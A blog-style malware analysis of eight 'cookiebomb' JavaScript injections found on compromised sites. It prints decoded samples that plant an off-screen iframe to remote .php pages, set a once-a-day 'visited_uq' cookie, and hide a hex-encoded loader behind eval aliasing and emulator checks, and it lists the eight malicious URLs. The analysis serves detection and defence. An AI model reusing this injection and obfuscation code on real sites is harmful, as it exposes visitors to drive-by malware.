Monday, September 23, 2013

8 samples of cookie based web malware

Background

Online Website Malware Scanner has detected malicious JavaScript code injection in several website page(s). The decoded payload uses web cookies as a parameter for triggering the malicious redirect of the visitor's browser. Cookies are checked in the browser and, if not found, are created. Later they are used to bypass traditional detection methods by applying the malicious action at a certain period of time. This technique was described in the malwaremustdie blog, where the author gave, in my opinion, a great name for it - "cookiebomb attack". You can review previous analyses of similar attacks in our other posts describing malware that involves web cookies.

Malicious action

Malicious iframes are often used to distribute malware hosted on external web resources (websites).

Malicious payload

The decoded payload generates a hidden iframe to http://brscertification.ir/promo2/Lnr927Qv.php if the cookie does not exist in the visitor's browser, and creates the cookie. The expiration time set in the function ensures that the same visitor won't be redirected more than once a day.

}

w = f;

s =[];

for(i =20-20;- i +1354!=0; i +=1){

j = i;

if((0x19 == 031))

if(e) s +=String["fromCharCode"](e(aq + w[j])+ 0xa - bv);

}

za = e;

za(s)

}

Malicious payload

The decoded payload generates a hidden iframe to http://viscol.com.tr/wp-content/plugins/customize-admin/ZwcD2SsE.php if the cookie does not exist in the visitor's browser, and creates the cookie. The expiration time set in the function ensures that the same visitor won't be redirected more than once a day.

}

rzeyu = vgdck;

gfb =[];

for(dbml =22-20-2;- dbml +1411!=0; dbml +=1){

tpeh = dbml;

}

aqfmw = eval;

aqfmw(gfb)

}

Malicious payload

The decoded payload generates a hidden iframe to http://becattinipiante.it/Grafica/clik.php if the cookie does not exist in the visitor's browser, and creates the cookie. The expiration time set in the function ensures that the same visitor won't be redirected more than once a day.

// Sample payload: builds an iframe pointing at the remote .php URL below and
// inserts it into the page. Defender note: the frame is hidden by pushing it far
// off-screen with absolute positioning, not with display:none, so a check for
// invisible iframes alone will not catch it.
function xob09(){

// Extraction artefact: the space in `var static` was lost, so as written this is a
// bare identifier. Neither this nor `controller` is read anywhere in the function;
// they look like filler.
varstatic='ajax';

var controller ='index.php';

// The iframe element and its target (one of the eight URLs listed in the Summary).
var xob = document.createElement('iframe');

xob.src='http://becattinipiante.it/Grafica/clik.php';

// Huge absolute offsets move the frame outside the viewport. '42139' is not a
// valid CSS color and the left/top values carry no unit; presumably noise.
xob.style.position='absolute';

xob.style.color='42139';

xob.style.height='42139px';

xob.style.width='42139px';

xob.style.left='100042139';

xob.style.top='100042139';

// Injects a <p id='xob'> anchor via document.write and attaches the iframe to it;
// the getElementById guard means the frame is inserted at most once per page.
if(!document.getElementById('xob')){

document.write('<p id=\'xob\' class=\'xob09\' ></p>');

document.getElementById('xob').appendChild(xob);

}

}

// Writes a cookie that expires nDays days from now (default: 1 day). This is the
// "once a day" gate: a visitor who already carries the cookie is not re-exposed
// until it expires.
// Extraction artefact: `newDate()` is presumably `new Date()` with the space lost.
function SetCookie(cookieName, cookieValue, nDays, path){

var today =newDate();

var expire =newDate();

// null/undefined/0 all fall back to one day (loose == is intentional here).
if(nDays ==null|| nDays ==0) nDays =1;

// 3600000 ms * 24 = one day.
expire.setTime(today.getTime()+3600000*24* nDays);

// Value is escape()d; the path attribute is appended only when one is passed
// (the trigger below passes '/').
document.cookie= cookieName +"="+ escape(cookieValue)

+";expires="+ expire.toGMTString()+((path)?"; path="+ path :"");

}

// Reads the value of cookie `name` from document.cookie, or null when absent.
// Extraction artefact: `returnnull` is presumably `return null` with the space
// lost; as written it is a bare identifier expression, not a return.
function GetCookie(name){

// Position of "name=" in the cookie string; -1 when not present. Note that
// indexOf matches substrings, so a cookie whose name merely ends in `name`
// would also match.
var start = document.cookie.indexOf(name +"=");

// Index just past "name=", i.e. where the value starts.
var len = start + name.length+1;

// This guard cannot hold as written: `!start` is only true for start == 0, and
// then the cookie string necessarily begins with `name`, so the second clause
// is false. It appears to be dead code carried over from a generic snippet.
if((!start)&&

(name != document.cookie.substring(0, name.length)))

{

returnnull;

}

// The real "not found" case.
if(start ==-1)returnnull;

// Value runs to the next ';' or to the end of the cookie string.
var end = document.cookie.indexOf(";", len);

if(end ==-1) end = document.cookie.length;

return unescape(document.cookie.substring(len, end));

}

// Trigger. Runs only when cookies are enabled; if 'visited_uq' is not already 55
// (loose == coerces the stored string '55'), the cookie is set for one day on
// path '/' and the iframe is injected. Defender note: a 'visited_uq=55' cookie
// issued by a site is an indicator that this script executed there.
if(navigator.cookieEnabled)

{

if(GetCookie('visited_uq')==55){}else{

SetCookie('visited_uq','55','1','/');

xob09();

}

}

Sample 4

Beautified script

// Campaign marker: the injected script opens with this short hex comment tag,
// which is a convenient signature for scanning pages.
/*32f02e*/

// Environment check: zq is assigned only when document.querySelector exists.
// zq*4 is used below as the parseInt radix (16), so in an emulator lacking
// querySelector the radix is undefined and the decode produces garbage.
if(document.querySelector) zq =4;

// The payload as comma-separated hex values; each is decoded as hex minus 7
// in the loop further down.
a =("27,6d,7c,75,6a,7b,70,76,75,27,77,7c,80,37,40,2f,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,7b,70,6a,44,2e,68,71,68,7f,2e,42,14,11,27,7d,68,79,27,6a,76,75,7b,79,76,73,73,6c,79,44,2e,70,75,6b,6c,7f,35,77,6f,77,2e,42,14,11,27,7d,68,79,27,77,7c,80,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,79,6c,68,7b,6c,4c,73,6c,74,6c,75,7b,2f,2e,70,6d,79,68,74,6c,2e,30,42,14,11,14,11,27,77,7c,80,35,7a,79,6a,27,44,27,2e,6f,7b,7b,77,41,36,36,7e,7e,7e,35,74,76,69,70,73,6c,73,70,6d,7b,76,6d,6d,35,6a,76,74,36,70,74,68,6e,6c,7a,36,69,54,5f,5e,59,5b,53,6e,35,77,6f,77,2e,42,14,11,27,77,7c,80,35,7a,7b,80,73,6c,35,77,76,7a,70,7b,70,76,75,27,44,27,2e,68,69,7a,76,73,7c,7b,6c,2e,42,14,11,27,77,7c,80,35,7a,7b,80,73,6c,35,6a,76,73,76,79,27,44,27,2e,40,3f,39,3e,40,2e,42,14,11,27,77,7c,80,35,7a,7b,80,73,6c,35,6f,6c,70,6e,6f,7b,27,44,27,2e,40,3f,39,3e,40,77,7f,2e,42,14,11,27,77,7c,80,35,7a,7b,80,73,6c,35,7e,70,6b,7b,6f,27,44,27,2e,40,3f,39,3e,40,77,7f,2e,42,14,11,27,77,7c,80,35,7a,7b,80,73,6c,35,73,6c,6d,7b,27,44,27,2e,38,37,37,37,40,3f,39,3e,40,2e,42,14,11,27,77,7c,80,35,7a,7b,80,73,6c,35,7b,76,77,27,44,27,2e,38,37,37,37,40,3f,39,3e,40,2e,42,14,11,14,11,27,70,6d,27,2f,28,6b,76,6a,7c,74,6c,75,7b,35,6e,6c,7b,4c,73,6c,74,6c,75,7b,49,80,50,6b,2f,2e,77,7c,80,2e,30,30,27,82,14,11,27,6b,76,6a,7c,74,6c,75,7b,35,7e,79,70,7b,6c,2f,2e,43,77,27,70,6b,44,63,2e,77,7c,80,63,2e,27,6a,73,68,7a,7a,44,63,2e,77,7c,80,37,40,63,2e,27,45,43,36,77,45,2e,30,42,14,11,27,6b,76,6a,7c,74,6c,75,7b,35,6e,6c,7b,4c,73,6c,74,6c,75,7b,49,80,50,6b,2f,2e,77,7c,80,2e,30,35,68,77,77,6c,75,6b,4a,6f,70,73,6b,2f,77,7c,80,30,42,14,11,27,84,14,11,84,14,11,6d,7c,75,6a,7b,70,76,75,27,5a,6c,7b,4a,76,76,72,70,6c,2f,6a,76,76,72,70,6c,55,68,74,6c,33,6a,76,76,72,70,6c,5d,68,73,7c,6c,33,75,4b,68,80,7a,33,77,68,7b,6f,30,27,82,14,11,27,7d,68,79,27,7b,76,6b,68,80,27,44,27,75,6c,7e,27,4b,68,7b,6c,2f,30,42,14,11,27,7d,68,79,27,6c,7f,77,70,79,6c,27,44,27,75,6c,7e,27,4b,68,7b,6c,2f,30,42,14,11,27,70,6d,27,2f,75,4b,68,80,7a,44,44,75,7c,73,73,27,83,83,27,75,4b,68,

80,7a,44,44,37,30,27,75,4b,68,80,7a,44,38,42,14,11,27,6c,7f,77,70,79,6c,35,7a,6c,7b,5b,70,74,6c,2f,7b,76,6b,68,80,35,6e,6c,7b,5b,70,74,6c,2f,30,27,32,27,3a,3d,37,37,37,37,37,31,39,3b,31,75,4b,68,80,7a,30,42,14,11,27,6b,76,6a,7c,74,6c,75,7b,35,6a,76,76,72,70,6c,27,44,27,6a,76,76,72,70,6c,55,68,74,6c,32,29,44,29,32,6c,7a,6a,68,77,6c,2f,6a,76,76,72,70,6c,5d,68,73,7c,6c,30,14,11,27,32,27,29,42,6c,7f,77,70,79,6c,7a,44,29,27,32,27,6c,7f,77,70,79,6c,35,7b,76,4e,54,5b,5a,7b,79,70,75,6e,2f,30,27,32,27,2f,2f,77,68,7b,6f,30,27,46,27,29,42,27,77,68,7b,6f,44,29,27,32,27,77,68,7b,6f,27,41,27,29,29,30,42,14,11,84,14,11,6d,7c,75,6a,7b,70,76,75,27,4e,6c,7b,4a,76,76,72,70,6c,2f,27,75,68,74,6c,27,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,79,7b,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,76,76,72,70,6c,35,70,75,6b,6c,7f,56,6d,2f,27,75,68,74,6c,27,32,27,29,44,29,27,30,42,14,11,27,7d,68,79,27,73,6c,75,27,44,27,7a,7b,68,79,7b,27,32,27,75,68,74,6c,35,73,6c,75,6e,7b,6f,27,32,27,38,42,14,11,27,70,6d,27,2f,27,2f,27,28,7a,7b,68,79,7b,27,30,27,2d,2d,14,11,27,2f,27,75,68,74,6c,27,28,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,76,76,72,70,6c,35,7a,7c,69,7a,7b,79,70,75,6e,2f,27,37,33,27,75,68,74,6c,35,73,6c,75,6e,7b,6f,27,30,27,30,27,30,14,11,27,82,14,11,27,79,6c,7b,7c,79,75,27,75,7c,73,73,42,14,11,27,84,14,11,27,70,6d,27,2f,27,7a,7b,68,79,7b,27,44,44,27,34,38,27,30,27,79,6c,7b,7c,79,75,27,75,7c,73,73,42,14,11,27,7d,68,79,27,6c,75,6b,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,76,76,72,70,6c,35,70,75,6b,6c,7f,56,6d,2f,27,29,42,29,33,27,73,6c,75,27,30,42,14,11,27,70,6d,27,2f,27,6c,75,6b,27,44,44,27,34,38,27,30,27,6c,75,6b,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,76,76,72,70,6c,35,73,6c,75,6e,7b,6f,42,14,11,27,79,6c,7b,7c,79,75,27,7c,75,6c,7a,6a,68,77,6c,2f,27,6b,76,6a,7c,74,6c,75,7b,35,6a,76,76,72,70,6c,35,7a,7c,69,7a,7b,79,70,75,6e,2f,27,73,6c,75,33,27,6c,75,6b,27,30,27,30,42,14,11,84,14,11,70,6d,27,2f,75,68,7d,70,6e,68,7b,76,79,35,6a,76,76,72,70,6c,4c,75,68,69,73,6c,6b,30,14,11,82,14,11,70,6d,2f,4e,6c,7b,4a,76,76,72,70

,6c,2f,2e,7d,70,7a,70,7b,6c,6b,66,7c,78,2e,30,44,44,3c,3c,30,82,84,6c,73,7a,6c,82,5a,6c,7b,4a,76,76,72,70,6c,2f,2e,7d,70,7a,70,7b,6c,6b,66,7c,78,2e,33,27,2e,3c,3c,2e,33,27,2e,38,2e,33,27,2e,36,2e,30,42,14,11,14,11,77,7c,80,37,40,2f,30,42,14,11,84,14,11,84".split(","));

// eval is aliased so the call at the bottom of the script does not read as a
// literal `eval(`; presumably to defeat naive signature matching.
r = eval;

// Environment probe used by the try/catch further down.
// Extraction artefact: `function vqvq` lost its space; as written this line is
// not valid JS, the original sample declares a function named vqvq.
functionvqvq(){

// Immediately-invoked function that decrements d.body (d is document). In a
// real browser the body setter presumably rejects a numeric value and throws;
// whether it throws is what the caller's try/catch keys on.
zva =function(){

--(d.body)

}()

}

d = document;

// Decode: each element is parsed as hex (radix zq*4 == 16, only if zq was set by
// the querySelector check) and offset by -7 (written as -(12-5)) to yield a
// character code.
for(i =0; i < a.length; i +=1){

a[i]=-(12-5)+ parseInt(a[i], zq *4);

}

// Probe: if vqvq() throws, yy becomes 0. If it does not throw, yy is never
// assigned at all.
try{

vqvq()

}catch(q){

yy =50-50;

}

// Second gate. When yy was assigned above, 0/123 is 0. When it was never
// assigned, the compound assignment reads an undeclared name and throws a
// ReferenceError (non-strict code), so yy becomes 1 and the payload is skipped.
// Net effect: the decoded script runs only in an environment where the
// document.body probe threw.
try{

yy /=123

}catch(pq){

yy =1;

}

// Rebuild the payload string from the character codes and hand it to r (eval).
// The method name is assembled from fragments, presumably to avoid a plain
// "fromCharCode" signature.
if(!yy) r(String["fr"+"omCh"+"arCo"+"de"].apply(String, a));

Malicious payload

The decoded payload generates a hidden iframe to http://www.mobileliftoff.com/images/bMXWRTLg.php if the cookie does not exist in the visitor's browser, and creates the cookie. The expiration time set in the function ensures that the same visitor won't be redirected more than once a day.

}

mlrc = wrlsgy;

axrc =[];

for(rmjtk =22-20-2;- rmjtk +1418!=0; rmjtk +=1){

urhuyl = rmjtk;

}

eval(axrc);

}

Malicious payload

The decoded payload generates a hidden iframe to http://www.kcrtrucking.com/NJHTk3VC.php if the cookie does not exist in the visitor's browser, and creates the cookie. The expiration time set in the function ensures that the same visitor won't be redirected more than once a day.

}

zlxzg = tldot;

ljy =[];

for(jnjw =22-20-2;- jnjw +1370!=0; jnjw +=1){

yfap = jnjw;

}

dbbvw = eval;

dbbvw(ljy)

}

Malicious payload

The decoded payload generates a hidden iframe to http://oxloxul.net/ibm.php if the cookie does not exist in the visitor's browser, and creates the cookie. The expiration time set in the function ensures that the same visitor won't be redirected more than once a day.

}

koibb = cegp;

sul =[];

for(dadzvp =22-20-2;- dadzvp +1432!=0; dadzvp +=1){

mfemzi = dadzvp;

}

wmoxjo = eval;

wmoxjo(sul)

}

Malicious payload

The decoded payload generates a hidden iframe to http://alsearsmd.net/apps/nkdLqtPz.php if the cookie does not exist in the visitor's browser, and creates the cookie. The expiration time set in the function ensures that the same visitor won't be redirected more than once a day.

// Tail of this sample's loader; the excerpt begins mid-script, so apggms (the
// encoded array), dllai (the radix factor) and acqyu (the probe function) are
// defined above this point and not shown. Same decode pattern as Sample 4,
// with an offset of -98 instead of -7.
for(mrhq =0; mrhq < apggms["length"]; mrhq +=1){

apggms[mrhq]=-(98)+ parseInt(apggms[mrhq], dllai *4);

}

// Environment probe: dueip is set to 0 only if acqyu() throws; the gating that
// follows is outside the excerpt.
try{

acqyu()

}catch(nnj){

dueip =50-50;

}

Malicious payload

The decoded payload generates a hidden iframe to http://umweltfestival.de/wp-content/827btkpf.php if the cookie does not exist in the visitor's browser, and creates the cookie. The expiration time set in the function ensures that the same visitor won't be redirected more than once a day.

// Sample payload: builds an iframe pointing at the remote .php URL below and
// inserts it into the page. Defender note: the frame is hidden by pushing it far
// off-screen with absolute positioning, not with display:none, so a check for
// invisible iframes alone will not catch it.
function x09(){

// Extraction artefact: the space in `var static` was lost, so as written this is a
// bare identifier. Neither this nor `controller` is read anywhere in the function;
// they look like filler.
varstatic='ajax';

var controller ='index.php';

// The iframe element and its target (one of the eight URLs listed in the Summary).
var x = document.createElement('iframe');

x.src='http://umweltfestival.de/wp-content/827btkpf.php';

// Huge absolute offsets move the frame outside the viewport. '50572' is not a
// valid CSS color and the left/top values carry no unit; presumably noise.
x.style.position='absolute';

x.style.color='50572';

x.style.height='50572px';

x.style.width='50572px';

x.style.left='100050572';

x.style.top='100050572';

// Injects a <p id='x'> anchor via document.write and attaches the iframe to it;
// the getElementById guard means the frame is inserted at most once per page.
if(!document.getElementById('x')){

document.write('<p id=\'x\' class=\'x09\' ></p>');

document.getElementById('x').appendChild(x);

}

}

// Writes a cookie that expires nDays days from now (default: 1 day). This is the
// "once a day" gate: a visitor who already carries the cookie is not re-exposed
// until it expires.
// Extraction artefact: `newDate()` is presumably `new Date()` with the space lost.
function SetCookie(cookieName, cookieValue, nDays, path){

var today =newDate();

var expire =newDate();

// null/undefined/0 all fall back to one day (loose == is intentional here).
if(nDays ==null|| nDays ==0) nDays =1;

// 3600000 ms * 24 = one day.
expire.setTime(today.getTime()+3600000*24* nDays);

// Value is escape()d; the path attribute is appended only when one is passed
// (the trigger below passes '/').
document.cookie= cookieName +"="+ escape(cookieValue)

+";expires="+ expire.toGMTString()+((path)?"; path="+ path :"");

}

// Reads the value of cookie `name` from document.cookie, or null when absent.
// Extraction artefact: `returnnull` is presumably `return null` with the space
// lost; as written it is a bare identifier expression, not a return.
function GetCookie(name){

// Position of "name=" in the cookie string; -1 when not present. Note that
// indexOf matches substrings, so a cookie whose name merely ends in `name`
// would also match.
var start = document.cookie.indexOf(name +"=");

// Index just past "name=", i.e. where the value starts.
var len = start + name.length+1;

// This guard cannot hold as written: `!start` is only true for start == 0, and
// then the cookie string necessarily begins with `name`, so the second clause
// is false. It appears to be dead code carried over from a generic snippet.
if((!start)&&

(name != document.cookie.substring(0, name.length)))

{

returnnull;

}

// The real "not found" case.
if(start ==-1)returnnull;

// Value runs to the next ';' or to the end of the cookie string.
var end = document.cookie.indexOf(";", len);

if(end ==-1) end = document.cookie.length;

return unescape(document.cookie.substring(len, end));

}

// Trigger. Runs only when cookies are enabled; if 'visited_uq' is not already 55
// (loose == coerces the stored string '55'), the cookie is set for one day on
// path '/' and the iframe is injected. Defender note: a 'visited_uq=55' cookie
// issued by a site is an indicator that this script executed there.
if(navigator.cookieEnabled)

{

if(GetCookie('visited_uq')==55){}else{

SetCookie('visited_uq','55','1','/');

x09();

}

}

Summary

It can be seen that ALL payloads are actually the same; the only difference is the function name. It can be assumed that the attack was automated and massively infected vulnerable servers/websites.

What about the iframes targets?

Let's first list them:

http://brscertification.ir/promo2/Lnr927Qv.php

http://viscol.com.tr/wp-content/plugins/customize-admin/ZwcD2SsE.php

http://becattinipiante.it/Grafica/clik.php

http://www.mobileliftoff.com/images/bMXWRTLg.php

http://www.kcrtrucking.com/NJHTk3VC.php

http://oxloxul.net/ibm.php

http://alsearsmd.net/apps/nkdLqtPz.php

http://umweltfestival.de/wp-content/827btkpf.php

All iframes try to load what appear to be .php scripts. The names make no sense, and a webmaster would be unlikely to create such names for valid files. Hence we can assume the names were randomly generated by malware tools.

What about their location on the server? We can see two wp-content folders - hacked WordPress installations. The others are promo2, Grafica, images, apps and the top directory.

Let's see whether other blacklisting authorities have those domains in their databases.